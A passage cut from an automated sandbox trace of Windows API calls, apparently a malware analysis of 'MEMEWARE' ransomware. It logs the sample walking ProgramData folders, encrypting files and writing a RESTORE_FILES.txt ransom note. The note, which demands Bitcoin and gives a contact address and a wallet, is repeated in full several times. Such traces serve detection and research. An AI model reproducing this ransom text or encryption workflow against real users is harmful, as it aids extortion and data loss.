(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.042] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.042] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.042] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RESTORE_FILES.txt") returned 60 [0071.042] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.042] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.042] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.043] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.043] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.043] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.043] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0071.043] CloseHandle (hObject=0xb4) returned 1 [0071.043] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.043] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0071.043] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0071.043] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0071.043] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0071.043] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0071.044] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp") returned 37 [0071.044] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0071.044] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0071.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*") returned 39 [0071.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.044] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.044] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.044] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.044] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.044] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\.") returned 39 [0071.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.044] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.044] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.044] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.044] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.044] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.044] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\..") returned 40 [0071.044] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.044] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.044] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Windows") returned -1 [0071.044] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Program Files") returned 1 [0071.044] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Program Files (x86)") returned 1 [0071.044] lstrcmpiW (lpString1="sql2950.tmp", lpString2="$Recycle.bin") returned 1 [0071.044] lstrcmpiW (lpString1="sql2950.tmp", lpString2="System Volume Information") returned -1 [0071.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2950.tmp") returned 49 [0071.044] StrStrIW (lpFirst="sql2950.tmp", lpSrch=".protected") returned 0x0 [0071.044] lstrcmpW (lpString1="sql2950.tmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.044] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.044] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.044] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2950.tmp" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql2950.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.045] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.045] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Windows") returned -1 [0071.045] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Program Files") returned 1 [0071.045] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Program Files (x86)") returned 1 [0071.045] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="$Recycle.bin") returned 1 [0071.045] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="System Volume Information") returned -1 [0071.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2A2C.tmp") returned 49 [0071.045] StrStrIW (lpFirst="sql2A2C.tmp", lpSrch=".protected") returned 0x0 [0071.045] lstrcmpW (lpString1="sql2A2C.tmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2A2C.tmp" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql2a2c.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.045] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.045] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\RESTORE_FILES.txt") returned 55 [0071.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.046] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.046] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.047] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.047] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.047] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.047] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0071.047] CloseHandle (hObject=0xb4) returned 1 [0071.047] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.047] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.047] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\RESTORE_FILES.txt") returned 50 [0071.047] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\rac\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.062] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.062] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.063] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.063] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.063] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.063] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0071.063] CloseHandle (hObject=0xa4) returned 1 [0071.064] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.064] lstrcmpiW (lpString1="Search", lpString2="Windows") returned -1 [0071.064] lstrcmpiW (lpString1="Search", lpString2="Program Files") returned 1 [0071.064] lstrcmpiW (lpString1="Search", lpString2="Program Files (x86)") returned 1 [0071.064] lstrcmpiW (lpString1="Search", lpString2="$Recycle.bin") returned 1 [0071.064] lstrcmpiW (lpString1="Search", lpString2="System Volume Information") returned -1 [0071.064] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search") returned 35 [0071.064] lstrcmpW (lpString1="Search", lpString2=".") returned 1 [0071.064] lstrcmpW (lpString1="Search", lpString2="..") returned 1 [0071.064] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*") returned 37 [0071.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.065] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.065] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.065] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.065] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.065] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.065] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\.") returned 37 [0071.065] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.065] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.065] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.065] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.065] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.065] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.065] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.065] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\..") returned 38 [0071.065] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.065] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.065] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.065] lstrcmpiW (lpString1="Data", lpString2="Windows") returned -1 [0071.065] lstrcmpiW (lpString1="Data", lpString2="Program Files") returned -1 [0071.065] lstrcmpiW (lpString1="Data", lpString2="Program Files (x86)") returned -1 [0071.065] lstrcmpiW (lpString1="Data", lpString2="$Recycle.bin") returned 1 [0071.065] lstrcmpiW (lpString1="Data", lpString2="System Volume Information") returned -1 [0071.065] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data") returned 40 [0071.066] lstrcmpW (lpString1="Data", lpString2=".") returned 1 [0071.066] lstrcmpW (lpString1="Data", lpString2="..") returned 1 [0071.066] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*") returned 42 [0071.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.066] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.066] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.066] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.066] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.066] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.066] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\.") returned 42 [0071.066] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.066] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.066] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.066] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.066] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.066] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.066] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.066] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\..") returned 43 [0071.066] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.066] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.066] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.066] lstrcmpiW (lpString1="Applications", lpString2="Windows") returned -1 [0071.066] lstrcmpiW (lpString1="Applications", lpString2="Program Files") returned -1 [0071.066] lstrcmpiW (lpString1="Applications", lpString2="Program Files (x86)") returned -1 [0071.066] lstrcmpiW (lpString1="Applications", lpString2="$Recycle.bin") returned 1 [0071.066] lstrcmpiW (lpString1="Applications", lpString2="System Volume Information") returned -1 [0071.066] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications") returned 53 [0071.066] lstrcmpW (lpString1="Applications", lpString2=".") returned 1 [0071.067] lstrcmpW (lpString1="Applications", lpString2="..") returned 1 [0071.067] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*") returned 55 [0071.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.275] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.275] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.275] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.275] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.275] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.275] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\.") returned 55 [0071.275] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.275] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.275] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.275] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.275] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.275] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.275] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.275] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\..") returned 56 [0071.275] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.275] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.275] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.275] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0071.275] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.276] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.276] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\RESTORE_FILES.txt") returned 71 [0071.276] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.276] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour 